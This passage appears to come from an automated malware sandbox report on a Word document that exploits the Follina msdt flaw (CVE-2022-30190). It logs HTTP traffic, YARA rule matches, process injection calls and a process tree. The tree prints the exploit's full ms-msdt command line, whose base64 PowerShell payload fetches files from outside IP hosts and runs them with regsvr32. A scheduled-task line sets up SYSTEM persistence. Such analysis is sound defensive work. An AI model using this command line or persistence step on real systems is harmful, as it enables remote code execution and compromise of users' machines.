                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://webshell.suite.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://wus2.contentsync.
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://wus2.pagecontentsync.
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://www.odwebp.svc.ms
                            Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMTIf-None-Match: "6299dd5d-1861"Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /1676044147.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 185.234.247.119Connection: Keep-Alive
                            Source: 00000007.00000002.544430061.00000000029A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: 00000007.00000002.544117188.0000000002910000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: 00000007.00000002.544599667.00000000029A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: 00000007.00000002.545886890.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: Process Memory Space: msdt.exe PID: 6524, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F08FB8E.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3646D980.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049F358D26_2_049F358D
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049F298826_2_049F2988
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049F824026_2_049F8240
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049F670F26_2_049F670F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049F635026_2_049F6350
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0537358D27_2_0537358D
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0537298827_2_05372988
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0537670F27_2_0537670F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0537635027_2_05376350
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0537824027_2_05378240
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_05BA298828_2_05BA2988
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_05BA358D28_2_05BA358D
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_05BA670F28_2_05BA670F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_05BA635028_2_05BA6350
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_05BA824028_2_05BA8240
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 33_2_007B298833_2_007B2988
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 33_2_007B358D33_2_007B358D
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 33_2_007B824033_2_007B8240
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 33_2_007B635033_2_007B6350
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 33_2_007B670F33_2_007B670F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049ED447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,26_2_049ED447
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049ED959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,26_2_049ED959
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0536D959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,27_2_0536D959
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0536D447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,27_2_0536D447
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_05B9D959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,28_2_05B9D959
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_05B9D447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,28_2_05B9D447
                            Source: DiagPackage.dll.mui.7.drStatic PE information: No import functions for PE file found
                            Source: DiagPackage.dll.7.drStatic PE information: No import functions for PE file found
                            Source: DiagPackage.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: DiagPackage.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: DiagPackage.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: jr3.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: jr3.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: jr3.dllJump to behavior
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: jr3.dll
                            Source: doc782.docxVirustotal: Detection: 23%
                            Source: doc782.docxReversingLabs: Detection: 17%
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jsmb0bcn\jsmb0bcn.cmdline
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6719.tmp" "c:\Users\user\AppData\Local\Temp\jsmb0bcn\CSC77C6618222CF46A59B8ECBD8FB1D6F27.TMP"
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrcfnpcx\hrcfnpcx.cmdline
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AFF.tmp" "c:\Users\user\AppData\Local\Temp\hrcfnpcx\CSC21799C95C9C74436A487E343E485758E.TMP"
                            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
                            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
                            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0x1gvsr0\0x1gvsr0.cmdline
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES51A8.tmp" "c:\Users\user\AppData\Local\Temp\0x1gvsr0\CSCC2AC50C55CDA45EB81AFC36471CF588E.TMP"
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t.A"
                            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t.A"
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exeJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exeJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6719.tmp" "c:\Users\user\AppData\Local\Temp\jsmb0bcn\CSC77C6618222CF46A59B8ECBD8FB1D6F27.TMP"Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AFF.tmp" "c:\Users\user\AppData\Local\Temp\hrcfnpcx\CSC21799C95C9C74436A487E343E485758E.TMP"Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES51A8.tmp" "c:\Users\user\AppData\Local\Temp\0x1gvsr0\CSCC2AC50C55CDA45EB81AFC36471CF588E.TMP"Jump to behavior
                            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59Jump to behavior
                            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t.A"
                            Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32Jump to behavior
                            Source: doc782.LNK.0.drLNK file: ..\..\..\..\..\Desktop\doc782.docx
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{DF46434D-AC68-4BBF-9884-01277EAB76C6} - OProcSessId.datJump to behavior
                            Source: classification engineClassification label: mal100.troj.expl.evad.winDOCX@31/32@0/1
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049EE400 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,26_2_049EE400
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049EB96A CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,26_2_049EB96A
                            Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{51E5EFC8-945D-4846-978B-9B2003A58611}
                            Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{38FD291B-687C-4AD1-84D6-EB9E83258CEC}
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_01
                            Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{51E5EFC8-945D-4846-978B-9B2003A58611}
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLLJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
                            Source: Binary string: amstream.pdb source: explorer.exe, 00000021.00000003.495697141.0000000004B92000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.496818765.0000000005602000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.501625478.0000000004E93000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000021.00000003.495697141.0000000004B92000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.496818765.0000000005602000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.501625478.0000000004E93000.00000004.00000800.00020000.00000000.sdmp
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049FB02E push ebx; ret 26_2_049FB02F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049E01B0 pushad ; iretd 26_2_049E01B1
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049FAD7C push cs; iretd 26_2_049FAE52
